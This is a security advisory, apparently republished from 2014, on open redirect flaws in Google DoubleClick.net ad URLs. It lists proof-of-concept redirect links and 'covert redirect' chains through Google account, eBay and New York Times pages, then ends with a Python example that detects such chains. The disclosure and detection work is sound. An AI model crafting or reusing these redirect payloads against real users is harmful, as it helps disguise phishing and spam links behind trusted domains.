Google DoubleClick Open Redirect

2014.11.15
Credit: Wang Jing
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

Google DoubleClick.net (Advertising) System URL Redirection Vulnerabilities Can Be Used by Spammers

Although Google does not include Open Redirect vulnerabilities in its bug bounty program, its preventive measures against Open Redirect attacks have been quite thorough and effective to date. However, Google appears to have overlooked the security of its DoubleClick.net advertising system. After some testing, it was found that most of the redirection URLs within DoubleClick.net are vulnerable to Open Redirect; many redirection endpoints are likely to be affected, and these redirections can easily be abused by spammers.

Some URLs belonging to googleads.g.doubleclick.net are vulnerable to Open Redirect attacks as well, even though Google prevents similar URL redirection on its other ad hosts (see (2.1.2)). Attackers can combine them with URLs related to Google Accounts to make the attacks more powerful. Moreover, these vulnerabilities can be used to attack other companies, such as Google, eBay and The New York Times, by bypassing their Open Redirect filters ("Covert Redirect").

*(1) Background Related to Google DoubleClick.net.*

*(1.1) What is DoubleClick.net?*

"DoubleClick is the ad technology foundation to create, transact, and manage digital advertising for the world's buyers, creators and sellers."
http://www.google.com.sg/doubleclick/

*(1.2) Reports Related to Google DoubleClick.net Used by Spammers*

*(1.2.1)* Google DoubleClick.net has been used by spammers for a long time. The following is from a report in 2008.

"The open redirect had become popular with spammers trying to lure users into clicking their links, as they could be made to look like safe URLs within Google's domain."
https://www.virusbtn.com/blog/2008/06_03a.xml?comments

*(1.2.2)* Mitechmate published a blog post about DoubleClick.net spam in 2014.

"Ad.doubleclick.net is recognized as a perilous adware application that causes unwanted redirections when surfing on certain webpages. Actually it is another browser hijacker that aims to distribute frauds to make money. Commonly people pick up the Ad.doubleclick virus when downloading software, browsing porn sites or reading spam email attachments. It enters into the computer sneakily after the computer is used insecurely. Ad.doubleclick.net is not just annoying; this malware traces users' personal information, which would be utilized by cyber criminals."
http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/

*(1.2.3)* Malwarebytes posted a news item about DoubleClick.net malvertising in 2014.

"Large malvertising campaign under way involving DoubleClick and Zedo"
https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/

*(2) DoubleClick.net System URL Redirection Vulnerabilities Details.*

These vulnerabilities can be exploited without the user being logged in. Tests were performed on Firefox (26.0) on Ubuntu (12.04) and IE (9.0.15) on Windows 7.

The webpage used for the following tests is "http://www.tetraph.com/security". For the purpose of the PoCs, suppose that this webpage is malicious.

*(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net.*

*(2.1.1)* Some URLs belonging to googleads.g.doubleclick.net are vulnerable to Open Redirect attacks, while Google prevents similar URL redirection on hosts other than googleads.g.doubleclick.net. The redirect target is carried in the adurl parameter; in the PoCs below only adurl is changed, the ai and sig values are kept from the original ad links.

Vulnerable URLs:
http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo
http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com

POC:
http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security
http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security

Attackers can make use of the following Google Account URLs to make the attacks more powerful, e.g.

https://www.google.com/accounts/ServiceLogin?continue=https%3A%2F%2Fsites.google.com%2Fsite%2Fissrabhi%2Fhome&service=jotspot&passive=true&ul=1
https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fwww.orkut.com%2FRedirLogin%3Fmsg%3D1%26auth%3D*

POC:
https://www.google.com/accounts/ServiceLogin?continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessaybeans%2Freflections%2Fsolitude.html
https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.diebiyi.com%2Farticles

*(2.1.2)* Google prevents similar URL redirection on hosts other than googleads.g.doubleclick.net. For example, the following googleadservices.com links carry the same adurl parameter but are protected:

http://www.googleadservices.com/pagead/aclk?sa=L&ai=C8u9OibgEU_XIOKrNswfrzYDgAY2FhfgE1aLjnoYB-7qSCxADILhPKANQrt2khP3_____AWC_BaAB8-vV0gPIAQGqBChP0AshNp656okgv3tSxmgc3JZeuS25cM0HlW9wUqHwxL8nk75mFPqsgAf1k6otkAcB&num=3&val=ChA2MWI5ODZkYzA4MTlmZmRlEN-mlZgFGgghk-txLb-9bSABKAAwhPDs-dD_xPHhATj6w5KYBUD6w5KYBQ&sig=AOD64_2f3wWGlepm4KMYlixE15qmjC1FGw&adurl=http://freshservice.com/free-service-desk/
http://www.googleadservices.com/pagead/aclk?sa=L&ai=C6w2J2VL1UtqeFtPFsQe_xICACOur9I0Gm4qOwXKd4q7LvAEQAiC4TygCUPrp_p7______wFgvwWgAY2TjcoDyAEBqQJGONe13HWqPqoEIk_QksMhB61R5_EBc-rRl0G3mUtOQjLemb4NjAETa6dj-AGAB9vs8jWQBwE&num=2&val=ChA5MDRhYzc4NjJiNjFlMzZlEO6g15cFGgjqLoQCBAXi2SABKAAw6sfV44GF7cZ_OMbI1ZcFQMbI1ZcF&sig=AOD64_1g--5hg2Tc0L5irweEKYqbh1FwSw&adurl=https://www.singtelshop.com/mobile/phone-details.jsf%3FbrandId%3D122%26modelId%3DZ10

*(2.2) Vulnerable URLs Related to DoubleClick.net.*

The ad.doubleclick.net click trackers take the destination directly after the "?" in the path (in the first form the "?" is encoded as %3f), and cm.g.doubleclick.net takes it from the forward parameter.

Vulnerable URLs 1:
http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml

POC:
http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.inzeed.com/kaleidoscope/
http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.tetraph.com/security

Vulnerable URLs 2:
http://ad.doubleclick.net/clk;275260754;102106837;b?http://zerodistance.cio.com
http://ad.doubleclick.net/clk;276304929;103445101;w?http://tracker.marinsm.com/rd

POC:
http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/
http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security

Vulnerable URLs 3:
http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com
http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http%3A%2F%2Fwww.reuters.com%

POC:
http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http://www.inzeed.com/kaleidoscope/
http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security

...

From the above we can see that Google DoubleClick.net has Open Redirect vulnerabilities and could be misused by spammers.

*(2.3)* POC Video:
https://www.youtube.com/watch?v=lfKHVGHWvk8&feature=youtu.be

*(3) Google DoubleClick.net Can Adversely Affect Other Websites.*

At the same time, Google DoubleClick.net can be used for "Covert Redirect" against other websites, such as Google, eBay and The New York Times, to bypass their Open Redirect filters: a filter that only admits trusted domains accepts a doubleclick.net link as the redirect target, and that link then forwards the user to an arbitrary destination.

*(3.1)* Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net

Vulnerable URL:
https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/

POC:
https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity

More Details:
Video: https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be
Blog: http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html

*(3.2)* eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net

Vulnerable URL:
http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/

POC:
http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=http://www.tetraph.com/security

More Details:
Video: https://www.youtube.com/watch?v=a4H-u17Y9ks
Blog: http://tetraph.blogspot.com/2014/11/ebay-covert-redirect-vulnerability.html

*(3.3)* The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on Google Doubleclick.net

Vulnerable URL:
http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ffacebook%2Ecom%2Fall%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion

POC:
http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity%3F%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion

More Details:
Video: https://www.youtube.com/watch?v=3XtrUqzxNW0
Blog: http://computerobsess.blogspot.com/2014/11/nytimes-covert-redirect-vulnerability.html

These vulnerabilities were reported to Google earlier in 2014, but Google does not appear to have taken any action yet. All of the vulnerabilities are still unpatched.

Reporter: Wang Jing, Mathematics, Nanyang Technological University
http://www.tetraph.com/wangjing

More Details:
http://tetraph.com/security/open-redirect/google-doubleclick-netadvertising-system-url-redirection-vulnerabilities-can-be-used-by-spammers/
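The redirect chains in sections (2) and (3), worked through as an added example; this is not code from the advisory or from Google, eBay or The New York Times. It assumes only what the advisory's URLs show: the redirect target sits in adurl, forward, continue, mpre or goto, or directly after the "?" in an ad.doubleclick.net click/clk path. The SAMPLES are constructed stand-ins with the long ai=/sig= tokens replaced by placeholders, naive_filter and strict_filter are hypothetical site-side filters written to illustrate the bypass, and TRUSTED is an assumed allowlist.

```python
# Added example (not from the advisory): resolve the PoC redirect chains statically
# and show why a filter that trusts doubleclick.net by hostname is bypassed.
# Assumptions: parameter names and the "click;...?http://" form are read off the
# advisory's URLs; SAMPLES are constructed, with ai=/sig= tokens replaced by
# placeholders; naive_filter/strict_filter are illustrative, not any site's code.
from urllib.parse import urlsplit, parse_qs, unquote

# Query parameter that carries the redirect target on each host (suffix match).
REDIRECT_PARAMS = {
    "googleads.g.doubleclick.net": "adurl",
    "cm.g.doubleclick.net": "forward",
    "google.com": "continue",          # www.google.com and accounts.google.com
    "rover.ebay.com": "mpre",
    "nytimes.com": "goto",
}


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def on_domain(host, domain):
    return host == domain or host.endswith("." + domain)


def redirect_target(url):
    """Return the next hop that `url` would send the browser to, or None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if on_domain(host, "ad.doubleclick.net"):
        # click;...?http://target and clk;...?http://target: the target is
        # everything after the first '?'.  Some links encode that '?' as %3f,
        # so it lands in the path rather than the query string.
        if parts.query.startswith(("http://", "https://")):
            return parts.query
        decoded = unquote(parts.path)
        return decoded.split("?", 1)[1] if "?http" in decoded else None
    for domain, param in REDIRECT_PARAMS.items():
        if on_domain(host, domain):
            values = parse_qs(parts.query).get(param, [])
            if values and values[0].startswith(("http://", "https://")):
                return values[0]
    return None


def resolve_chain(url, max_hops=8):
    """Hosts visited from the first hop to the final destination, no network needed."""
    hops = [host_of(url)]
    while url is not None and len(hops) <= max_hops:
        url = redirect_target(url)
        if url is not None:
            hops.append(host_of(url))
    return hops


def naive_filter(url, trusted):
    """The bypassed check: looks only at the hostname of the link itself."""
    return any(on_domain(host_of(url), d) for d in trusted)


def strict_filter(url, trusted):
    """Every hop, including the final destination, must be on a trusted domain."""
    return all(any(on_domain(h, d) for d in trusted) for h in resolve_chain(url))


# Constructed samples mirroring the advisory's PoC shapes (tokens shortened).
SAMPLES = {
    "aclk": "http://googleads.g.doubleclick.net/aclk?sa=L&ai=AI_TOKEN&num=0&sig=SIG_TOKEN"
            "&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security",
    "click": "http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;"
             "0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.tetraph.com/security",
    "clk": "http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security",
    "pixel": "http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc"
             "&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security",
    # Covert redirect: continue= admits googleads.g.doubleclick.net, which forwards anywhere.
    "google": "https://www.google.com/accounts/Logout?service=wise&continue="
              "http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DAI_TOKEN"
              "%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity",
    "ebay": "http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602"
            "&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=AI_TOKEN"
            "%26adurl=http://www.tetraph.com/security",
    "nyt": "http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&goto="
           "http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs"
           "%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity",
    # A legitimate ad link whose final destination is itself trusted.
    "benign": "http://googleads.g.doubleclick.net/aclk?sa=L&ai=AI_TOKEN&adurl=https://www.google.com/",
}

# Assumed allowlist of a site-side filter: the site itself plus Google's ad hosts.
TRUSTED = ["google.com", "doubleclick.net", "ebay.com", "nytimes.com"]

if __name__ == "__main__":
    for name, url in SAMPLES.items():
        print(f"{name:7} {' -> '.join(resolve_chain(url))}")
        print(f"        naive={naive_filter(url, TRUSTED)} strict={strict_filter(url, TRUSTED)}")
```

Every PoC-shaped sample passes naive_filter, because its first hop is on google.com, doubleclick.net, ebay.com or nytimes.com, and fails strict_filter, because the chain ends on tetraph.com; only the benign link passes both. Static resolution like this is only as complete as the parameter table, so it is a detection aid rather than a fix: the durable remedy is for each redirector to bind its destination (an allowlist of full targets, or a signature that covers the target) instead of accepting any URL.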

References:

http://tetraph.com/security/open-redirect/google-doubleclick-netadvertising-system-url-redirection-vulnerabilities-can-be-used-by-spammers/


Copyright 2017, cxsecurity.com
